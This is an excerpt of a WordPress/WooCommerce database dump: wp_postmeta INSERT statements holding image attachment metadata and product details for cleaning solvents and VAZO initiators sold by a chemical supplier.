INSERT INTO `wp_postmeta` VALUES (14488, 1322, '_wp_attached_file', '2016/08/9974.tif'); 
INSERT INTO `wp_postmeta` VALUES (14492, 1325, '_wp_attached_file', '2016/08/9975.tif'); 
INSERT INTO `wp_postmeta` VALUES (14494, 1326, '_wp_attached_file', '2016/08/9980.tif'); 
INSERT INTO `wp_postmeta` VALUES (14500, 1329, '_wp_attached_file', '2016/08/9982.tif'); 
INSERT INTO `wp_postmeta` VALUES (14501, 1330, '_wp_attached_file', '2016/08/9829.tif'); 
INSERT INTO `wp_postmeta` VALUES (14502, 1331, '_wp_attached_file', '2016/08/9831.tif'); 
INSERT INTO `wp_postmeta` VALUES (14503, 1332, '_wp_attached_file', '2016/08/9880.tif'); 
INSERT INTO `wp_postmeta` VALUES (14507, 1334, '_wp_attached_file', '2016/08/9882.tif'); 
INSERT INTO `wp_postmeta` VALUES (14511, 1338, '_edit_lock', '1480081206:3'); 
INSERT INTO `wp_postmeta` VALUES (14512, 1338, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (14513, 1339, '_wp_attached_file', '2016/09/cleaner.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14514, 1339, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6050;s:6:"height";i:4038;s:4:"file";s:19:"2016/09/cleaner.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"cleaner-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"cleaner-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"cleaner-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"cleaner-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"cleaner-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"cleaner-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"cleaner-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"cleaner-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14515, 1338, '_thumbnail_id', '1339'); 
INSERT INTO `wp_postmeta` VALUES (14516, 1338, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14517, 1338, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14518, 1338, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14519, 1338, '716_default_editor', '<ul>\r\n 	<li>Plastic, Metal, Glass</li>\r\n 	<li class="description-list-item">Excellent for use on dials, gauges and oscilloscopes</li>\r\n 	<li class="description-list-item">Recommended for aircraft windshields</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14520, 1338, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14521, 1338, '317_default_editor', '<table width="1075">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Pump</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Spray</strong></td>\r\n<td style="text-align: center;" width="219"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="167"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">16 oz.</td>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">1 Gallon</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">16 oz.</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14522, 1338, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14523, 1338, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14524, 1338, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14525, 1338, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14526, 1338, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14527, 1338, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14528, 1338, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14529, 1338, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14530, 1338, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14531, 1338, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14532, 1338, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14533, 1338, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14534, 1338, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14535, 1338, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14536, 1338, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14537, 1338, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14538, 1338, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14539, 1338, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14540, 1338, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14541, 1338, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14542, 1338, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14543, 1338, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14544, 1338, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14545, 1338, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14546, 1338, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14547, 1338, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14548, 1338, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14549, 1338, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14550, 1338, '_product_image_gallery', '1747'); 
INSERT INTO `wp_postmeta` VALUES (14551, 1338, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14552, 1341, '_wp_attached_file', '2016/08/VAZO-52-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14553, 1341, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:610;s:6:"height";i:294;s:4:"file";s:21:"2016/08/VAZO-52-1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"VAZO-52-1-340x294.jpg";s:5:"width";i:340;s:6:"height";i:294;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"VAZO-52-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"VAZO-52-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"VAZO-52-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"VAZO-52-1-510x294.jpg";s:5:"width";i:510;s:6:"height";i:294;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14555, 1344, '_edit_lock', '1476373606:2'); 
INSERT INTO `wp_postmeta` VALUES (14556, 1344, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14558, 1344, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14559, 1344, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14560, 1344, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Property @ 25°C (77°F)</td>\r\n<td width="224"></td>\r\n</tr>\r\n<tr>\r\n<td width="202">Molecular Weight</td>\r\n<td style="text-align: center;" width="224">362 g/mol</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Boiling Point</td>\r\n<td style="text-align: center;" width="224">110°C (230°F)</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Freezing Point</td>\r\n<td style="text-align: center;" width="224"> &lt;-90°C (&lt;-130°F)</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Critical Temperature</td>\r\n<td style="text-align: center;" width="224">240°C (464°F)</td>\r\n</tr>\r\n<tr>\r\n<td width="202">KB Value</td>\r\n<td style="text-align: center;" width="224"> 6</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Density</td>\r\n<td style="text-align: center;" width="224">1580 kg/m<sup>3 (13.1 lb/gal)</sup></td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Viscosity</td>\r\n<td style="text-align: center;" width="224">0.71 cSt</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Liquid Specific Heat</td>\r\n<td style="text-align: center;" width="224">1.0 kJ/kg-K</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="202">Liquid Thermal Conductivity</td>\r\n<td style="text-align: center;" width="224">0.065 W/m-K</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Surface Tension</td>\r\n<td style="text-align: center;" width="224">18 Dyn/cm</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Vapor Pressure</td>\r\n<td style="text-align: center;" width="224">2.9 KPa</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Heat of Vaporization</td>\r\n<td style="text-align: center;" width="224">115 kJ/kg</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Solubility in Water</td>\r\n<td style="text-align: center;" width="224">&lt;1 ppm</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Water Solubility</td>\r\n<td style="text-align: center;" width="224">80 ppm</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Flash Point, CC ASTM D56</td>\r\n<td style="text-align: center;" width="224">None</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Flash Point, OC, ASTM D1310</td>\r\n<td style="text-align: center;" width="224">None</td>\r\n</tr>\r\n<tr>\r\n<td width="202">Vapor Flammability, ASTM E661</td>\r\n<td style="text-align: center;" width="224">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14561, 1344, '716_default_editor', '<ul>\r\n 	<li>Cleaning agent</li>\r\n 	<li>Coating agent (carrier fluid) for fluorinated materials</li>\r\n 	<li>Aerosol Solvent</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14562, 1344, '719_default_editor', '<ul>\r\n 	<li>ASTM D56</li>\r\n 	<li>ASTM D1310</li>\r\n 	<li>ASTM E661</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14563, 1344, '318_custom_list_file', 'a:1:{s:32:"84da3d0276a8ec85fcf519234b784eb5";a:3:{s:4:"name";s:18:"Opteon Suprion PDF";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/Opteon-Suprion.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14564, 1344, '317_default_editor', '<table width="487">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14565, 1344, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14566, 1344, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14567, 1344, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14568, 1344, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14569, 1344, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14570, 1344, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14571, 1344, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14572, 1344, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14573, 1344, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14574, 1344, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14575, 1344, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14576, 1344, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14577, 1344, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14578, 1344, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14579, 1344, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14580, 1344, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14581, 1344, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14582, 1344, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14583, 1344, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14584, 1344, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14585, 1344, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14586, 1344, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14587, 1344, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14588, 1344, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14589, 1344, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (14590, 1344, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (14591, 1344, '_ywtm_content_tab_description', '<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14592, 1344, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14593, 1344, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14594, 1344, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14595, 1344, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14596, 1344, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (14618, 1345, '_wp_attached_file', '2016/09/Opteon-Suprion.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14619, 1344, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14620, 1344, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14621, 1347, '_wp_attached_file', '2016/09/opteon-suprion.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14622, 1347, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4784;s:6:"height";i:4784;s:4:"file";s:26:"2016/09/opteon-suprion.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"opteon-suprion-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"opteon-suprion-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"opteon-suprion-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"opteon-suprion-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"opteon-suprion-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"opteon-suprion-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"opteon-suprion-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"opteon-suprion-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14623, 1344, '_thumbnail_id', '1347'); 
INSERT INTO `wp_postmeta` VALUES (14624, 1344, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14625, 1348, '_wp_attached_file', '2016/08/VAZO-64-AIBN-NEW.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14626, 1348, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:436;s:6:"height";i:320;s:4:"file";s:28:"2016/08/VAZO-64-AIBN-NEW.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"VAZO-64-AIBN-NEW-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"VAZO-64-AIBN-NEW-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"VAZO-64-AIBN-NEW-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"VAZO-64-AIBN-NEW-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14628, 1349, '_wp_attached_file', '2016/09/opteon-sion-specialty-cleaning-fluid-technical-information.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14629, 1350, '_wp_attached_file', '2016/08/VAZO-64-AIBN-NEW2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14630, 1350, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:436;s:6:"height";i:320;s:4:"file";s:29:"2016/08/VAZO-64-AIBN-NEW2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"VAZO-64-AIBN-NEW2-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"VAZO-64-AIBN-NEW2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"VAZO-64-AIBN-NEW2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"VAZO-64-AIBN-NEW2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14631, 427, '_thumbnail_id', '1600'); 
INSERT INTO `wp_postmeta` VALUES (14632, 1350, '_wp_attachment_backup_sizes', 'a:2:{s:14:"thumbnail-orig";a:4:{s:4:"file";s:29:"VAZO-64-AIBN-NEW2-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:23:"thumbnail-1473338803740";a:4:{s:4:"file";s:44:"VAZO-64-AIBN-NEW2-e1473338712664-340x180.jpg";s:5:"width";i:340;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (14633, 1351, '_wp_attached_file', '2016/08/VAZO-52-NEW.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14634, 1351, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:436;s:6:"height";i:320;s:4:"file";s:23:"2016/08/VAZO-52-NEW.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"VAZO-52-NEW-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"VAZO-52-NEW-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"VAZO-52-NEW-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"VAZO-52-NEW-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14635, 568, '_thumbnail_id', '1434'); 
INSERT INTO `wp_postmeta` VALUES (14636, 1352, '_wp_attached_file', '2016/08/VAZO-67-NEW.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14637, 1352, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:436;s:6:"height";i:320;s:4:"file";s:23:"2016/08/VAZO-67-NEW.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"VAZO-67-NEW-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"VAZO-67-NEW-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"VAZO-67-NEW-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"VAZO-67-NEW-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14638, 575, '_thumbnail_id', '1280'); 
INSERT INTO `wp_postmeta` VALUES (14639, 1353, '_wp_attached_file', '2016/08/vazo88-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14640, 1353, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:436;s:6:"height";i:320;s:4:"file";s:20:"2016/08/vazo88-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"vazo88-2-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"vazo88-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"vazo88-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"vazo88-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14641, 577, '_thumbnail_id', '1293'); 
INSERT INTO `wp_postmeta` VALUES (14642, 1356, '_wp_attached_file', '2016/08/Mi.jpg'); 
